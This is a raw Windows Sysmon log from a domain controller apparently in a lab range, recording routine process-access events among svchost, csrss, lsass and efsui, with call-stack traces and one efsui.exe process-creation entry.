13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E44-6005-0B00-00000000A301}856888C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\efsext.dll+2d2c|C:\Windows\system32\EFSCORE.dll+18451|C:\Windows\system32\EFSCORE.dll+17c2a|C:\Windows\system32\EFSCORE.dll+17805|C:\Windows\system32\EFSCORE.dll+18bd|C:\Windows\system32\efssvc.dll+1337|C:\Windows\System32\sechost.dll+b71a|C:\Windows\System32\sechost.dll+a574|C:\Windows\system32\lsasrv.dll+5212e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\System32\efsui.exe10.0.14393.0 (rs1_release.160715-1616)EFS UI ApplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationefsui.exeefsui.exe /efs /installdraC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=6DFA1BBB4D2F89DC46BACABC83B6AB95,SHA256=1106CE6AE6EDFFA752D71F5EFF9FAAB53360CFFC6B224957760FBDC0A7D4FF17,IMPHASH=B865E978ADDB9A939A91896A60E81464{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\System32\lsass.exeC:\Windows\system32\lsass.exe 10341000x800000000000000010030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 